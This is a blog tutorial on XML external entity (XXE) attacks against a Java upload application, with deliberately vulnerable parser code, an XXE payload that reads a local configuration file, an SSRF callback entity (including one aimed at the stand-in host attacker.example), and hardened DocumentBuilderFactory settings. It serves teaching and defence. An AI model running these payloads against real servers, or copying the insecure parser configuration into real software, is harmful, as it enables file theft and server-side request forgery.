XXE attack and Secure coding

Pravinrp
5 min read, Oct 9, 2020


Today let us look at how an XML file is processed in a Java web application, and how malicious input can affect both the web application and the underlying server when the XML parsing is configured insecurely.

XXE attack flow

Most penetration testers already know what an XXE attack is, so rather than explaining the attack itself I would like to show how insecure coding leads to it. If you would like to learn what an XXE attack is, please check out the links below.

I have implemented a basic XXE-vulnerable Java web application. When a valid XML file is uploaded, the application displays the data from the uploaded file to the user.

I have created an HTML file for the file upload.

upload.html file

Below is the Java code that parses the uploaded XML file and displays its content to the user. I have provided comments on each line to explain the purpose of the code.

Document object is defined
Each element is printed from XML file
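The following is an added, stand-alone reconstruction of that parser, not the author's code from the screenshot. It uses a `DocumentBuilderFactory` in its default configuration, which is exactly the insecure sink the attack scenarios below exploit, and walks the parsed document to build the text the page displays. The employee XML embedded in `main` is constructed sample input standing in for `validxml.xml`, whose real content is not shown on the page.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

public class VulnerableXmlUpload {

    // Parses the uploaded bytes with a DocumentBuilderFactory in its DEFAULT
    // configuration: DTDs are allowed and external entities are resolved and
    // expanded. This is the insecure sink the attack scenarios rely on.
    static Document parseUpload(InputStream upload) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); // no hardening features set
        DocumentBuilder db = dbf.newDocumentBuilder();
        return db.parse(upload);                                           // entity expansion happens here
    }

    // Walks every <employee> element and returns what the page would display.
    static String render(Document doc) {
        StringBuilder out = new StringBuilder();
        NodeList employees = doc.getElementsByTagName("employee");
        for (int i = 0; i < employees.getLength(); i++) {
            Element emp = (Element) employees.item(i);
            NodeList fields = emp.getChildNodes();
            for (int j = 0; j < fields.getLength(); j++) {
                Node field = fields.item(j);
                if (field.getNodeType() != Node.ELEMENT_NODE) continue; // skip whitespace text nodes
                // getTextContent() returns the expanded entity value, so a SYSTEM
                // entity pointing at a local file ends up in the HTML response.
                out.append(field.getNodeName()).append(": ")
                   .append(field.getTextContent().trim()).append('\n');
            }
            out.append('\n');
        }
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample standing in for validxml.xml (the real file is not on the page).
        String validXml =
            "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n" +
            "<employees>\n" +
            "  <employee><firstName>Alice</firstName><lastName>Smith</lastName></employee>\n" +
            "  <employee><firstName>Bob</firstName><lastName>Jones</lastName></employee>\n" +
            "</employees>";
        InputStream upload = new ByteArrayInputStream(validXml.getBytes(StandardCharsets.ISO_8859_1));
        System.out.print(render(parseUpload(upload)));
    }
}
```

In a real servlet the `InputStream` would come from the multipart upload rather than from a string; everything after that point is identical, which is why the factory configuration, not the upload handling, is what decides whether the application is exploitable.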

Now, let us see how this application behaves for different inputs.

Scenario:1

A valid XML file is given.

valid xml file

Let us launch the application.

XML file to be uploaded
validxml.xml file is uploaded

Now, the result is shown in the application.

The content of the XML file is displayed

Scenario:2

Let us try to upload a file that is not valid XML; its extension is ".xml.sql". Since the content is not well-formed XML, the parser cannot process it and the application throws an exception to the user. (Surfacing the raw parser exception to the user is itself a weakness, since it reveals implementation details; it is worth handling separately.)

Invalid file is uploaded

The result is shown below: the application displays the exception.

An exception from the application

Attack Scenario:

To perform the XXE attack, the payload has to be defined properly. Several outcomes are possible via XXE depending on the application's behaviour; here I use it to read a sensitive file from the application server.

In practice most applications are deployed on Linux servers. In this scenario, however, the application is deployed on my local Windows machine to simulate the attack, which is why the payload below uses a Windows drive path. I will access a sensitive file stored on that machine.

Below is the payload; it is embedded in the valid XML file. The DOCTYPE defines an external entity named file, and the entity is then referenced (as &file;) inside one of the element values, so that the parser substitutes the file content into the data the application displays.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE example [
<!ELEMENT example ANY >
<!ENTITY file SYSTEM "file:///G:/Java_learning/Files/application.conf" >
]>

Malicious XML file

Let us see how the application behaves with malicious input.

Malicious XML file is uploaded

The attacker is able to read the configuration file stored on the application machine, and its content is returned in the response.

application.conf file content is displayed in the output

As shown above, if an attacker finds a vulnerable endpoint in an application, he/she can read any file the application's service account can access, and can go further depending on the parser and the environment.

Attack Scenario:2

I am also able to make the vulnerable server send a request to an external server, which gives an SSRF primitive as well. SSRF can be used to reach internal services that are not exposed to the attacker and, in some environments, to escalate further from there. Below is the payload given in the XML file: an external entity whose SYSTEM identifier is a webhook.site URL.

webhook.site is used here to confirm whether the vulnerable application makes a request to the external server.

webhook.site is integrated
Malicious file is uploaded

Now, let us see the result. The employee's last name is shown empty. However, the request was made from the vulnerable machine to the external site webhook.site.

We can see that the request was received a moment ago, and the host details show where the request actually originated from.

Secure coding:

The best way to prevent XXE attacks is to disable the parsing of Document Type Declarations (DTDs) entirely for untrusted data. If that is not possible, disable the parsing of external general entities and external parameter entities (and the loading of external DTDs).

Let us add the line below to the DocumentBuilderFactory (dbf) to disallow DOCTYPE declarations.

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Doctype declaration is disabled
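The following is an added, stand-alone example (not the author's code) that builds the hardened `DocumentBuilderFactory` both ways: the preferred `disallow-doctype-decl` switch from above, and the fallback feature set for an application that genuinely has to accept an inline DTD. It goes beyond the post in two respects: it also covers the fallback configuration, and it feeds both the file-read payload from Attack Scenario 1 and a constructed callback payload like the one in Attack Scenario 2 into each factory. The host `attacker.example` stands in for the webhook.site URL and is a placeholder, and `tryParse` is an assumed helper that reports the outcome instead of returning the raw exception to the user.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXParseException;

public class SecureXmlFactory {

    // Preferred: reject any DOCTYPE. A document with no DTD cannot declare entities,
    // so neither the file-read nor the SSRF payload can be expressed at all.
    static DocumentBuilderFactory strictFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return dbf;
    }

    // Fallback when inline DTDs are required by the application's own format:
    // keep the DOCTYPE but stop the parser from fetching or expanding anything external.
    static DocumentBuilderFactory lenientFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);          // XInclude is another route to pull in external content
        dbf.setExpandEntityReferences(false); // do not inline entity values into text nodes
        return dbf;
    }

    // Parses the upload and reports the outcome instead of leaking the raw
    // parser exception (and any file paths in it) back to the user.
    static String tryParse(DocumentBuilderFactory dbf, String xml) {
        try {
            dbf.newDocumentBuilder().parse(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.ISO_8859_1)));
            return "parsed";
        } catch (SAXParseException e) {
            return "rejected: " + e.getMessage();   // log this server-side; show the user a generic error
        } catch (Exception e) {
            return "error: " + e.getClass().getSimpleName();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed payloads modelled on the ones in the post. The file path is the
        // one from the post; the callback host is a placeholder, not a real target.
        String fileReadPayload =
            "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n" +
            "<!DOCTYPE example [\n" +
            "<!ELEMENT example ANY >\n" +
            "<!ENTITY file SYSTEM \"file:///G:/Java_learning/Files/application.conf\" >\n" +
            "]>\n" +
            "<example>&file;</example>";
        String ssrfPayload =
            "<?xml version=\"1.0\"?>\n" +
            "<!DOCTYPE example [\n" +
            "<!ENTITY ping SYSTEM \"http://attacker.example/xxe\" >\n" + // placeholder for the webhook.site URL
            "]>\n" +
            "<example>&ping;</example>";

        System.out.println("strict,  file read: " + tryParse(strictFactory(), fileReadPayload));
        System.out.println("strict,  callback:  " + tryParse(strictFactory(), ssrfPayload));
        System.out.println("lenient, file read: " + tryParse(lenientFactory(), fileReadPayload));
        System.out.println("lenient, callback:  " + tryParse(lenientFactory(), ssrfPayload));
    }
}
```

With the strict factory both payloads are rejected before any entity is declared, which is the behaviour shown in Attack Scenario 3. With the lenient factory the documents still parse, but the external entities are neither fetched nor expanded, so no file is read and no outbound request is made; the price is that the parser still has to process the DTD, which is why the strict factory remains the default choice for untrusted uploads.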

Attack Scenario:3

Let us upload the same malicious file again and check how the application reacts to it.

malicious file is uploaded

The application throws an exception stating that DOCTYPE is disallowed in the XML file, so the attacker's entity is never declared, let alone expanded. As with the invalid-file case earlier, this parser exception should be caught and replaced with a generic error message before it reaches the user.

I hope this demonstration has given you a glimpse of how an XXE attack occurs and how to prevent it. The prevention method varies with the application's design and implementation. The development and security teams need to discuss this class of vulnerability during the design phase and prevent it during the coding phase.

Please support and share if you like this post.

If you like the content, please follow me on medium and LinkedIn

LinkedIn: https://www.linkedin.com/in/pravin-r-p-oscp-28497712b/



Pravinrp

OSCP/Security geek & researcher (Application/infrastructure/Mobile/cloud security)